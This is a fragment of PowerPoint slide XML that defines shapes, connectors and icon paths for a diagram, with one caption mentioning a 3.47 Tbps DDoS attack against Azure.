                <a:gd name="T3" fmla="*/ 0 h 20"/>
                <a:gd name="T4" fmla="*/ 154 w 164"/>
                <a:gd name="T5" fmla="*/ 0 h 20"/>
                <a:gd name="T6" fmla="*/ 10 w 164"/>
                <a:gd name="T7" fmla="*/ 0 h 20"/>
                <a:gd name="T8" fmla="*/ 9 w 164"/>
                <a:gd name="T9" fmla="*/ 0 h 20"/>
                <a:gd name="T10" fmla="*/ 0 w 164"/>
                <a:gd name="T11" fmla="*/ 10 h 20"/>
                <a:gd name="T12" fmla="*/ 9 w 164"/>
                <a:gd name="T13" fmla="*/ 20 h 20"/>
                <a:gd name="T14" fmla="*/ 11 w 164"/>
                <a:gd name="T15" fmla="*/ 20 h 20"/>
                <a:gd name="T16" fmla="*/ 153 w 164"/>
                <a:gd name="T17" fmla="*/ 20 h 20"/>
                <a:gd name="T18" fmla="*/ 155 w 164"/>
                <a:gd name="T19" fmla="*/ 20 h 20"/>
                <a:gd name="T20" fmla="*/ 164 w 164"/>
                <a:gd name="T2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0">
                  <a:moveTo>
                    <a:pt x="164" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="5"/>
                    <a:pt x="160" y="0"/>
                    <a:pt x="155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9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53" y="20"/>
                    <a:pt x="153" y="20"/>
                    <a:pt x="153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60" y="20"/>
                    <a:pt x="164" y="16"/>
                    <a:pt x="164" y="10"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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0" name="Freeform 101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F2DA69D-1CD6-4F36-A9E3-B6469A232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0258" y="5756494"/>
              <a:ext cx="1031919" cy="123831"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 9 w 164"/>
                <a:gd name="T1" fmla="*/ 0 h 20"/>
                <a:gd name="T2" fmla="*/ 0 w 164"/>
                <a:gd name="T3" fmla="*/ 10 h 20"/>
                <a:gd name="T4" fmla="*/ 9 w 164"/>
                <a:gd name="T5" fmla="*/ 20 h 20"/>
                <a:gd name="T6" fmla="*/ 18 w 164"/>
                <a:gd name="T7" fmla="*/ 20 h 20"/>
                <a:gd name="T8" fmla="*/ 146 w 164"/>
                <a:gd name="T9" fmla="*/ 20 h 20"/>
                <a:gd name="T10" fmla="*/ 155 w 164"/>
                <a:gd name="T11" fmla="*/ 20 h 20"/>
                <a:gd name="T12" fmla="*/ 164 w 164"/>
                <a:gd name="T13" fmla="*/ 10 h 20"/>
                <a:gd name="T14" fmla="*/ 155 w 164"/>
                <a:gd name="T15" fmla="*/ 0 h 20"/>
                <a:gd name="T16" fmla="*/ 153 w 164"/>
                <a:gd name="T17" fmla="*/ 0 h 20"/>
                <a:gd name="T18" fmla="*/ 11 w 164"/>
                <a:gd name="T19" fmla="*/ 0 h 20"/>
                <a:gd name="T20" fmla="*/ 9 w 164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0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60" y="20"/>
                    <a:pt x="164" y="15"/>
                    <a:pt x="164" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="5"/>
                    <a:pt x="160" y="0"/>
                    <a:pt x="155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A572C85B-15D7-4A38-9DB4-11896D4EFA3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3937508" y="4863606"/>
            <a:ext cx="1162050" cy="495300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1162050"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 495300"/>
              <a:gd name="connsiteX1" fmla="*/ 679450 w 1162050"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 495300"/>
              <a:gd name="connsiteX2" fmla="*/ 1162050 w 1162050"/>
              <a:gd name="connsiteY2" fmla="*/ 495300 h 495300"/>
              <a:gd name="connsiteX3" fmla="*/ 1162050 w 1162050"/>
              <a:gd name="connsiteY3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0" h="495300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="679450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162050" y="495300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162050" y="495300"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700"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23" name="Connecteur droit 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{617C08D9-D9B3-41FA-9EF2-6D61C520C4B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3928873" y="3726914"/>
            <a:ext cx="626589" cy="1525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 : forme 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{246ABE4E-359A-42B9-8112-E8FE6779BD5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3937508" y="2082306"/>
            <a:ext cx="1162050" cy="495300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1162050"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 495300"/>
              <a:gd name="connsiteX1" fmla="*/ 679450 w 1162050"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 495300"/>
              <a:gd name="connsiteX2" fmla="*/ 1162050 w 1162050"/>
              <a:gd name="connsiteY2" fmla="*/ 495300 h 495300"/>
              <a:gd name="connsiteX3" fmla="*/ 1162050 w 1162050"/>
              <a:gd name="connsiteY3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0" h="495300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="679450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162050" y="495300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162050" y="495300"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700"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6" name="Ellipse 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E32A671-FA2C-41A7-BD79-924E570C7B96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3208873" y="1724613"/>
            <a:ext cx="720000" cy="7200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4" name="AutoShape 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AFFDAE7-3637-494E-A8BA-E98A6312BE5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386701" y="5179771"/>
            <a:ext cx="364345" cy="362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3" name="Ellipse 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9C1D262-655E-4053-802C-BB2CD2A997A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3208873" y="5001213"/>
            <a:ext cx="720000" cy="7200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2" name="Ellipse 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E37316C6-E019-4A46-94DC-A1DB2F472EC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3208873" y="3367676"/>
            <a:ext cx="720000" cy="7200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5" name="Forme libre : forme 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA9AEB90-7880-47A4-8FBB-A2C0F4E4B409}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7074949" y="4863606"/>
            <a:ext cx="1162050" cy="495300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1162050"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 495300"/>
              <a:gd name="connsiteX1" fmla="*/ 679450 w 1162050"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 495300"/>
              <a:gd name="connsiteX2" fmla="*/ 1162050 w 1162050"/>
              <a:gd name="connsiteY2" fmla="*/ 495300 h 495300"/>
              <a:gd name="connsiteX3" fmla="*/ 1162050 w 1162050"/>
              <a:gd name="connsiteY3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0" h="495300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="679450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162050" y="495300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162050" y="495300"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700"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56" name="Connecteur droit 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6185D519-5E3D-4177-B708-AD8437E86843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="74" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7610411" y="3727676"/>
            <a:ext cx="646712" cy="763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orme libre : forme 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB30AAFC-BD91-4F83-8677-71887B5DA70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7074949" y="2082306"/>
            <a:ext cx="1162050" cy="495300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1162050"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 495300"/>
              <a:gd name="connsiteX1" fmla="*/ 679450 w 1162050"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 495300"/>
              <a:gd name="connsiteX2" fmla="*/ 1162050 w 1162050"/>
              <a:gd name="connsiteY2" fmla="*/ 495300 h 495300"/>
              <a:gd name="connsiteX3" fmla="*/ 1162050 w 1162050"/>
              <a:gd name="connsiteY3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0" h="495300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="679450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162050" y="495300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162050" y="495300"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700"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1" name="AutoShape 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A5F30B-7C7E-467A-83C0-51B4FD320103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8438288" y="1883556"/>
            <a:ext cx="365545" cy="399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0" name="Ellipse 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8332EE05-034A-4B61-8434-8DE7F9E5B8D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257123" y="1724613"/>
            <a:ext cx="720000" cy="7200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7" name="Ellipse 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58BE3DBF-A3E3-4188-9114-3CB160F0FB66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257123" y="5001213"/>
            <a:ext cx="720000" cy="7200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5" name="AutoShape 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36BBFA97-43F1-4DC4-8083-F14EFD17B9B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8442833" y="3630118"/>
            <a:ext cx="360363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4" name="Ellipse 99">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B4F1CEC-2C90-406B-978E-E0280C057E30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257123" y="3367676"/>
            <a:ext cx="720000" cy="7200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48" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E18B2478-9A8C-4936-9F82-3C22F83EDA0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="966540" y="4934092"/>
            <a:ext cx="2340000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1200" b="0" kern="1200" cap="all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1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8163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00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nb-NO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DDoS attack measures at 3,47 TBps against Azure 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6D38D4-7D63-4A48-8359-EB49AC2A44C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3401846" y="5197942"/>
            <a:ext cx="338609" cy="330310"/>
            <a:chOff x="15027822" y="4320635"/>
            <a:chExt cx="656163" cy="640081"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="Freeform 775">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0B310C2-A2C9-6C47-847D-6C6783F72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7822" y="4557046"/>
              <a:ext cx="656163" cy="403670"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1490 w 1648"/>
                <a:gd name="T1" fmla="*/ 1013 h 1013"/>
                <a:gd name="T2" fmla="*/ 158 w 1648"/>
                <a:gd name="T3" fmla="*/ 1013 h 1013"/>
                <a:gd name="T4" fmla="*/ 0 w 1648"/>
                <a:gd name="T5" fmla="*/ 855 h 1013"/>
                <a:gd name="T6" fmla="*/ 0 w 1648"/>
                <a:gd name="T7" fmla="*/ 740 h 1013"/>
                <a:gd name="T8" fmla="*/ 26 w 1648"/>
                <a:gd name="T9" fmla="*/ 714 h 1013"/>
                <a:gd name="T10" fmla="*/ 51 w 1648"/>
                <a:gd name="T11" fmla="*/ 740 h 1013"/>
                <a:gd name="T12" fmla="*/ 51 w 1648"/>
                <a:gd name="T13" fmla="*/ 855 h 1013"/>
                <a:gd name="T14" fmla="*/ 158 w 1648"/>
                <a:gd name="T15" fmla="*/ 962 h 1013"/>
                <a:gd name="T16" fmla="*/ 1490 w 1648"/>
                <a:gd name="T17" fmla="*/ 962 h 1013"/>
                <a:gd name="T18" fmla="*/ 1597 w 1648"/>
                <a:gd name="T19" fmla="*/ 855 h 1013"/>
                <a:gd name="T20" fmla="*/ 1597 w 1648"/>
                <a:gd name="T21" fmla="*/ 25 h 1013"/>
                <a:gd name="T22" fmla="*/ 1622 w 1648"/>
                <a:gd name="T23" fmla="*/ 0 h 1013"/>
                <a:gd name="T24" fmla="*/ 1648 w 1648"/>
                <a:gd name="T25" fmla="*/ 25 h 1013"/>
                <a:gd name="T26" fmla="*/ 1648 w 1648"/>
                <a:gd name="T27" fmla="*/ 855 h 1013"/>
                <a:gd name="T28" fmla="*/ 1490 w 1648"/>
                <a:gd name="T29" fmla="*/ 101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8" h="1013">
                  <a:moveTo>
                    <a:pt x="1490" y="1013"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="1013"/>
                    <a:pt x="158" y="1013"/>
                    <a:pt x="158" y="1013"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="1013"/>
                    <a:pt x="0" y="942"/>
                    <a:pt x="0" y="855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="740"/>
                    <a:pt x="0" y="740"/>
                    <a:pt x="0" y="740"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="726"/>
                    <a:pt x="12" y="714"/>
                    <a:pt x="26" y="714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="714"/>
                    <a:pt x="51" y="726"/>
                    <a:pt x="51" y="740"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="855"/>
                    <a:pt x="51" y="855"/>
                    <a:pt x="51" y="855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="914"/>
                    <a:pt x="99" y="962"/>
                    <a:pt x="158" y="962"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1490" y="962"/>
                    <a:pt x="1490" y="962"/>
                    <a:pt x="1490" y="962"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1549" y="962"/>
                    <a:pt x="1597" y="914"/>
                    <a:pt x="1597" y="855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1597" y="25"/>
                    <a:pt x="1597" y="25"/>
                    <a:pt x="1597" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1597" y="11"/>
                    <a:pt x="1608" y="0"/>
                    <a:pt x="1622" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1636" y="0"/>
                    <a:pt x="1648" y="11"/>
                    <a:pt x="1648" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1648" y="855"/>
                    <a:pt x="1648" y="855"/>
                    <a:pt x="1648" y="855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1648" y="942"/>
                    <a:pt x="1577" y="1013"/>
                    <a:pt x="1490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64" name="Freeform 776">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C3360C4-B9D3-4F42-A5D9-4E050A3A8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7822" y="4560262"/>
              <a:ext cx="19299" cy="250886"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 26 w 51"/>
                <a:gd name="T1" fmla="*/ 631 h 631"/>
                <a:gd name="T2" fmla="*/ 0 w 51"/>
                <a:gd name="T3" fmla="*/ 606 h 631"/>
                <a:gd name="T4" fmla="*/ 0 w 51"/>
                <a:gd name="T5" fmla="*/ 26 h 631"/>
                <a:gd name="T6" fmla="*/ 26 w 51"/>
                <a:gd name="T7" fmla="*/ 0 h 631"/>
                <a:gd name="T8" fmla="*/ 51 w 51"/>
                <a:gd name="T9" fmla="*/ 26 h 631"/>
                <a:gd name="T10" fmla="*/ 51 w 51"/>
                <a:gd name="T11" fmla="*/ 606 h 631"/>
                <a:gd name="T12" fmla="*/ 26 w 51"/>
                <a:gd name="T13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631">
                  <a:moveTo>
                    <a:pt x="26" y="631"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="631"/>
                    <a:pt x="0" y="620"/>
                    <a:pt x="0" y="60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606"/>
                    <a:pt x="51" y="606"/>
                    <a:pt x="51" y="606"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="620"/>
                    <a:pt x="40" y="631"/>
                    <a:pt x="26" y="6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65" name="Freeform 777">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A913C44A-A82A-624B-BB39-ADA6B59D6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8151" y="4320635"/>
              <a:ext cx="209072" cy="69155"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 28 w 526"/>
                <a:gd name="T1" fmla="*/ 173 h 173"/>
                <a:gd name="T2" fmla="*/ 9 w 526"/>
                <a:gd name="T3" fmla="*/ 165 h 173"/>
                <a:gd name="T4" fmla="*/ 9 w 526"/>
                <a:gd name="T5" fmla="*/ 130 h 173"/>
                <a:gd name="T6" fmla="*/ 10 w 526"/>
                <a:gd name="T7" fmla="*/ 129 h 173"/>
                <a:gd name="T8" fmla="*/ 526 w 526"/>
                <a:gd name="T9" fmla="*/ 128 h 173"/>
                <a:gd name="T10" fmla="*/ 510 w 526"/>
                <a:gd name="T11" fmla="*/ 148 h 173"/>
                <a:gd name="T12" fmla="*/ 493 w 526"/>
                <a:gd name="T13" fmla="*/ 166 h 173"/>
                <a:gd name="T14" fmla="*/ 45 w 526"/>
                <a:gd name="T15" fmla="*/ 166 h 173"/>
                <a:gd name="T16" fmla="*/ 28 w 526"/>
                <a:gd name="T17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6" h="173">
                  <a:moveTo>
                    <a:pt x="28" y="173"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="173"/>
                    <a:pt x="14" y="170"/>
                    <a:pt x="9" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="155"/>
                    <a:pt x="0" y="140"/>
                    <a:pt x="9" y="130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61" y="0"/>
                    <a:pt x="377" y="0"/>
                    <a:pt x="526" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="510" y="148"/>
                    <a:pt x="510" y="148"/>
                    <a:pt x="510" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="493" y="166"/>
                    <a:pt x="493" y="166"/>
                    <a:pt x="493" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="55"/>
                    <a:pt x="175" y="55"/>
                    <a:pt x="45" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="170"/>
                    <a:pt x="34" y="173"/>
                    <a:pt x="28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66" name="Freeform 778">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D899A5E-4BAE-F74D-971C-180A651E1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7822" y="4479850"/>
              <a:ext cx="656163" cy="307175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 828 w 1648"/>
                <a:gd name="T1" fmla="*/ 774 h 774"/>
                <a:gd name="T2" fmla="*/ 676 w 1648"/>
                <a:gd name="T3" fmla="*/ 724 h 774"/>
                <a:gd name="T4" fmla="*/ 11 w 1648"/>
                <a:gd name="T5" fmla="*/ 246 h 774"/>
                <a:gd name="T6" fmla="*/ 0 w 1648"/>
                <a:gd name="T7" fmla="*/ 226 h 774"/>
                <a:gd name="T8" fmla="*/ 9 w 1648"/>
                <a:gd name="T9" fmla="*/ 206 h 774"/>
                <a:gd name="T10" fmla="*/ 203 w 1648"/>
                <a:gd name="T11" fmla="*/ 40 h 774"/>
                <a:gd name="T12" fmla="*/ 239 w 1648"/>
                <a:gd name="T13" fmla="*/ 43 h 774"/>
                <a:gd name="T14" fmla="*/ 236 w 1648"/>
                <a:gd name="T15" fmla="*/ 78 h 774"/>
                <a:gd name="T16" fmla="*/ 66 w 1648"/>
                <a:gd name="T17" fmla="*/ 224 h 774"/>
                <a:gd name="T18" fmla="*/ 705 w 1648"/>
                <a:gd name="T19" fmla="*/ 683 h 774"/>
                <a:gd name="T20" fmla="*/ 951 w 1648"/>
                <a:gd name="T21" fmla="*/ 683 h 774"/>
                <a:gd name="T22" fmla="*/ 1581 w 1648"/>
                <a:gd name="T23" fmla="*/ 224 h 774"/>
                <a:gd name="T24" fmla="*/ 1376 w 1648"/>
                <a:gd name="T25" fmla="*/ 48 h 774"/>
                <a:gd name="T26" fmla="*/ 1373 w 1648"/>
                <a:gd name="T27" fmla="*/ 12 h 774"/>
                <a:gd name="T28" fmla="*/ 1409 w 1648"/>
                <a:gd name="T29" fmla="*/ 9 h 774"/>
                <a:gd name="T30" fmla="*/ 1639 w 1648"/>
                <a:gd name="T31" fmla="*/ 206 h 774"/>
                <a:gd name="T32" fmla="*/ 1647 w 1648"/>
                <a:gd name="T33" fmla="*/ 226 h 774"/>
                <a:gd name="T34" fmla="*/ 1637 w 1648"/>
                <a:gd name="T35" fmla="*/ 246 h 774"/>
                <a:gd name="T36" fmla="*/ 981 w 1648"/>
                <a:gd name="T37" fmla="*/ 724 h 774"/>
                <a:gd name="T38" fmla="*/ 828 w 1648"/>
                <a:gd name="T3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48" h="774">
                  <a:moveTo>
                    <a:pt x="828" y="774"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="775" y="774"/>
                    <a:pt x="721" y="757"/>
                    <a:pt x="676" y="724"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="246"/>
                    <a:pt x="11" y="246"/>
                    <a:pt x="11" y="246"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="241"/>
                    <a:pt x="0" y="234"/>
                    <a:pt x="0" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="219"/>
                    <a:pt x="3" y="211"/>
                    <a:pt x="9" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="40"/>
                    <a:pt x="203" y="40"/>
                    <a:pt x="203" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="31"/>
                    <a:pt x="230" y="32"/>
                    <a:pt x="239" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="53"/>
                    <a:pt x="247" y="69"/>
                    <a:pt x="236" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="224"/>
                    <a:pt x="66" y="224"/>
                    <a:pt x="66" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="705" y="683"/>
                    <a:pt x="705" y="683"/>
                    <a:pt x="705" y="683"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="779" y="736"/>
                    <a:pt x="878" y="736"/>
                    <a:pt x="951" y="683"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1581" y="224"/>
                    <a:pt x="1581" y="224"/>
                    <a:pt x="1581" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1376" y="48"/>
                    <a:pt x="1376" y="48"/>
                    <a:pt x="1376" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1365" y="39"/>
                    <a:pt x="1364" y="23"/>
                    <a:pt x="1373" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1382" y="1"/>
                    <a:pt x="1398" y="0"/>
                    <a:pt x="1409" y="9"/>
                  </a:cubicBezTo>
